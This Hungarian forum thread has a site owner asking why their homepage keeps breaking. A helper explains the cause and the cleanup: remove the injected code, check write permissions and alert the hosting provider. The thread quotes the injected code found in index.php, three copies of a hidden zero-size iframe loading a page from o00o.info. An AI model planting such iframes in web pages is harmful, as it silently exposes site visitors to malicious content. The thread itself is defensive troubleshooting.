Sziasztok!
Már másodszorra tapasztalom, hogy a kezdőoldalam "eltűnik".. A server loggból kiderült, hogy ezek a sorok a felelősek érte az index.php file-om végén:
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html> <html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html> <html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Tapasztaltatok ilyet?
Ez a szolgáltatóm hibája, hogy nem tudja megvédeni a file-jaimat?
Köszi előre is!
nanó
Fórum:
hack
Ugye, ebből az o00o.info az, amire keres az ember.
http://www.google.com/search?q=o00o.info és lőn találat. Úgy tűnik, hogy egy népszerű "webszerver vírusról" van szó, ami Joomla, Mambo, OSCommerce, Vbulletin telepítéseket is szeretettel fertőz. Az index.php és mindenféle .html fájlok elejére fűzi be magát ezekkel az iframekkel, miután gondolom a szerverre kerül valamilyen kihasználható webes alkalmazás által (az úgy tűnik mindegy, hogy ez egy házi készítésű dolog vagy valami kész program). Meg kell találni az iframe kódot, hogy hova került be, és törölni kell onnan.
Érdemes értesíteni a hoszting céget, hogy valahol sebezhető program van fent, amin keresztül ilyen szabadon futó PHP kódot be tudtak juttatni a szerverre. Ez bárhol lehet a szerveren, hiszen bármit tud írni, amihez a webszervernek joga van. Nézd meg, hogy a Drupal telepítésedben mire van írási jog megadva, és ezt vesd össze a telepítési utasítással.
Mik vannka :(
Mik vannka :(
Az élet egy szar játék, de kurva jó a grafikája!
nem túl bíztató..
Goba, köszönöm a segítséget! Utána körözök a szolgáltatónál..
nanó